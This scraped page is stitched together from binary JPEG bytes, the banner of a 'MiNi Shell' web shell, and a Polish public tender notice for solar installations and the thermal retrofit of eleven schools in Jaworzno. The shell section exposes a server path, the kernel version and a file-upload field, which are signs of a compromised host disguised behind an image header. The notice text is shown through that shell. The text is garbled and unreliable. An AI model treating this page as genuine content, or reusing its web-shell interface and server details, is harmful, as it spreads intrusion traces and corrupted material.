JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220425/0013411001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa Instalacji OZE wraz z termomodernizacją budynków oświatowych w Jaworznie” (w formule zaprojektuj i wybuduj) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZESPÓŁ OBSŁUGI PLACÓWEK OŚWIATOWO-WYCHOWAWCZYCH W JAWORZNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271076830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zacisze Boczna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaworzno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 6181800</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">remonty@mzopow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzopow.jaworzno.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Marcino Szulik prowadzący działalność gospodarczą pod firmą „Kancelaria Adwokacka Marcin Szulik”</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 243698216</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Zawiszy Czarnego 5 M</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">504-359-991</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">szulik_zamowienia_publiczne@interia.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.kancelaria-fraczek.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa Instalacji OZE wraz z termomodernizacją budynków oświatowych w Jaworznie” (w formule zaprojektuj i wybuduj) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2bec2da-c0a0-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00134110</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00335701/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa instalacji OZE wraz z termomodernizacją budynków oświatowych w Jaworznie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szulik.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj: poprzez PLATFORMĘ PRZETARGOWĄ pod adresem:<br/>https://szulik.logintrade.net/rejestracja/ustawowe.html<br/>(w wierszu oznaczonym tytułem oraz znakiem niniejszego postępowania) <br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1)	w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym), lub<br/>2)	w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>Ciąg dalszy w Rozdziale 12 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający złożyć ofertę– zobowiązany jest zapoznać się z instrukcjami użytkowników PLATFORMYPRZETARGOWEJ: <br/>1). „Rejestracja Wykonawcy na Platformie”<br/>2). „Zadawanie pytań do postępowania”<br/>3). „Wymagania techniczne”<br/>4). „Udział w trybie podstawowym bez negocjacji ”<br/> - dostępnymi pod adresem:<br/>https://szulik.logintrade.net/rejestracja/instrukcje.html<br/>oraz zaakceptować REGULAMIN korzystania z PLATFORMY PRZETARGOWEJ dostępny pod adresem:<br/>https://szulik.logintrade.net/rejestracja/regulamin.html<br/><br/>2.	Złożenie oferty poprzez PLATFORMĘPRZETARGOWĄ oznacza akceptację Regulaminu, o którym mowa w ust. 1niniejszego rozdziału SWZ.<br/>3.	Wymagania techniczne związane z korzystaniem z PLATFORMY PRZETARGOWEJ– wskazane są na stronie internetowej Platformy przetargowej - pod adresem:<br/>https://szulik.logintrade.net/rejestracja/instrukcje.html<br/><br/>4.	Wsparcia technicznego w zakresie działania PLATFORMY PRZETARGOWEJ udziela jej dostawca, tj. Logintrade SA ul. Braniborska, 2/10, 53-680 Wrocław, nr tel. +48 71 787 35 34, od poniedziałku do piątku (dni robocze) <br/>w godz. 8.ºº - 16ºº.e-mail: helpdesk@logintrade.net<br/><br/>5.	Sposoby złożenia oferty za pośrednictwem PLATFORMY PRETARGOWEJ oraz potwierdzenia złożenia oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników PLATFORMY PRZETARGOWEJ.<br/><br/>6.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp., z uwzględnieniem rodzaju przekazywanych danych.<br/><br/>7.	Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym oferty ), dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj. Dz.U. z 2017r., poz. 2247). <br/><br/>8.	Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6 niniejszego rozdziału SWZ, przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, wskazanych przez Zamawiającego w niniejszej SWZ.<br/><br/>9.	W przypadku gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące TAJEMNICĘ PRZEDSIĘBIORSTWA w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/><br/>10.	Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>Ciąg dalszy w Rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dot. RODO jest zamieszczona w Rozdziale 33 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OW.VII.260.15.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zamawiający zamawia a Wykonawca zobowiązuje się do wykonania w systemie „ zaprojektuj i wybuduj” zadania „Budowa instalacji OZE wraz z termomodernizacją budynków oświatowych w Jaworznie”, zadanie jest dofinansowane z Rządowego Funduszu Polski Ład : Program Inwestycji Strategicznych na podstawie wstępnej Promesy NR 01/2021/1318/Polski Ład.<br/>2. Przedmiot umowy obejmuje w szczególności : <br/>1) sporządzenie Projektu budowlanego zgodnie z obowiązującymi przepisami prawa, w zakresie zgodnym z Opisem Przedmiotu Zamówienia, oraz przedłożenie go Zamawiającemu do zatwierdzenia, oraz sporządzenie STWiORB. Podstawowe założenia w tym zakresie są określone w ust. 2.2 PFU stanowiącym Załącznik Nr 4.1.do SWZ. <br/>2) opracowanie Harmonogramu rzeczowo- terminowo – finansowego,<br/>3) zapewnienie nadzoru autorskiego nad realizacją Projektu,<br/>4) uzyskanie przez Wykonawcę wszelkich niezbędnych zatwierdzeń, pozwoleń, w tym pozwolenia na budowę, o ile okaże się konieczne,<br/>5) uzgodnienie z Zamawiającym koncepcji wszystkich rozwiązań projektowych, materiałowych oraz rodzajów i typów urządzeń oraz kolorystyki wykończenia elewacji, <br/>6) wykonanie przez Wykonawcę, przy użyciu własnych materiałów robót budowlanych według opracowanych projektów i i STWIORB, <br/>7) Zapewnienie i montaż tablic informacyjnych zgodnie z Rozporządzeniem Rady Ministrów z dnia 7 maja 2021 w sprawie określenia działań informacyjnych podejmowanych przez podmioty realizujące zadania finansowane lub dofinansowane z budżetu państwa lub państwowych funduszy celowych (Dz. U 2021 poz. 953 z późn.zm.), oraz § 10 załącznika do Uchwały nr 84/2021 Rady Ministrów z dnia 1 lipca 2021 w sprawie ustanowienie Rządowego Funduszu Polski Ład :program Inwestycji Strategicznych. <br/>8) montaż budek lęgowych zgodnie z opinią ornitologiczną,<br/>9) uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie obiektu, jeżeli takie będzie wymagane lub innego dokumentu dopuszczającego obiekt do użytkowania (zawiadomienia o przyjęciu zgłoszenia zakończenia budowy),<br/>10) wykonanie i przekazania Zamawiającemu dokumentacji powykonawczej po zakończeniu realizacji zamówienia,<br/>11) Wykonanie robót budowlanych zgonie z wykonanymi projektami . Roboty budowlane obejmują :<br/>1) Roboty budowlano - instalacyjne i montażowe obejmujące w szczególności budowę instalacji OZE w postaci paneli fotowoltaicznych, budowę instalacji odgromowych, częściową wymianę stolarki okiennej i drzwiowej, ocieplenie ścian i stropodachów, oraz wymianę grzejników .Roboty obejmują 11 budynków oświatowych w Jaworznie: <br/>- Specjalny Ośrodek Szkolno- Wychowawczy (SOSW) przy ul. Wolności 11 w Jaworznie, <br/>- Zespół Szkół Ponadpodstawowych nr 4 (ZSP4) przy ul. Armii Krajowej 5 w Jaworznie. <br/>- Liceum Ogólnokształcące nr 1 (LO1), przy ul. Licealnej 3 w Jaworznie<br/> - Przedszkole Miejskie Nr 1 (PM1), przy ul. Szymanowskiego 10 w Jaworznie<br/>- Przedszkole Miejskie Nr 5 (PM5), przy ul. 11 Listopada 3 w Jaworznie<br/>- Przedszkole Miejskie Nr 10 (PM10), przy ul. Tuwima 6 w Jaworznie<br/>- Przedszkole Miejskie Nr 17 (PM17), przy ul. Kościuszki 21 w Jaworznie<br/>- Szkoła Podstawowa Nr 7 (SP7), przy ul. Ławczana 12 w Jaworznie<br/>- Szkoła Podstawowa Nr 4 (SP4), przy ul. Olszewskiego 76 w Jaworznie<br/>- Zespół Szkół Ogólnokształcących (ZSO), przy ul. Towarowej 61 w Jaworznie<br/>- Szkoła Podstawowa Nr 17 (SP17) . przy ul. Starowiejska 15 w Jaworznie<br/>2) Budowę kotłowni gazowej w budynku SOSW ,<br/>3) Wymianę instalacji CO w 6 budynkach: SOSW, LO1,PM1,PM5,PM10,PM17. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert opisano w Rozdzialne 27 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na inwertery</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na wykonane roboty i pozostałe zainstalowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.WARUNKI UDZIAŁU w postępowaniu, określone przez Zamawiającego spośród warunków, o których mowa w art. 112 ust. 2 ustawy Pzp:<br/><br/>3.1.	Zdolność do występowania w obrocie gospodarczym- Zamawiający NIE określa wymagań w tym zakresie.<br/>3.2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej- Zamawiający NIE określa wymagań w tym zakresie.<br/><br/>3.3.	Sytuacja ekonomiczna lub finansowa:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji ekonomicznej lub finansowej jeżeli Wykonawca wykaże iż posiada środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż 12 000 000 PLN. BRUTTO <br/>UWAGA: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunku dotyczącego środków finansowych lub zdolności kredytowej, Wykonawcy wykazują łącznie. <br/><br/><br/><br/>3.4.	Zdolność techniczna lub zawodowa:<br/>3.4.1.	a).<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie montaż co najmniej dwóch instalacji fotowoltaicznych o wartości minimum 30 000,00 PLN brutto każda z nich.<br/>UWAGA : Mając na uwadze art. 117 ust. 1 ustawy Pzp Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek o którym wyżej mowa musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>3.4.1.b). <br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie dwie roboty budowlane o wartości minimum 1 000 000,00 zł brutto każda. Za roboty budowlane odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uznaje się roboty, w zakresie budowy lub przebudowy lub remontu budynku, obejmujące swym zakresem roboty termomodernizacyjne.<br/>UWAGA : W związku z powyższym Zamawiający uzna doświadczenie Wykonawcy za wystarczające jeżeli wykaże że zrealizował jedną robotę budowlaną obejmującą minimum 2 budynki w ramach jednej umowy jeżeli są spełnione łącznie poniższe warunki:<br/>- wartość robót na każdym z dwóch budynków wynosiła minimum 1000 000,00 zł brutto oraz <br/>- roboty były prowadzone w zakresie budowy lub przebudowy lub remontu budynku i obejmowały swym zakresem roboty termomodernizacyjne na każdym z tych budynków.<br/>UWAGA : Mając na uwadze art. 117 ust. 1 ustawy Pzp Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek o którym wyżej mowa musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>UWAGA (dotyczy ust. 3.4.1 a oraz 3.4.1 b) : <br/>- Mając na uwadze art. 117 ust. 1 ustawy Pzp Zamawiający informuje że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek określony w ust. 3.4.1 a oraz w ust. 3.4.1b nie musi zostać spełniony łącznie przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca. To znaczy warunek określony w ust. 3.4.1a może być spełniony przez jednego wykonawcę a warunek określony w ust. 3.4.1 b przez innego wykonawcę. <br/>- Pojęcia budowa, przebudowa, remont i budynek należy rozumieć zgodnie z przepisami ustawy z 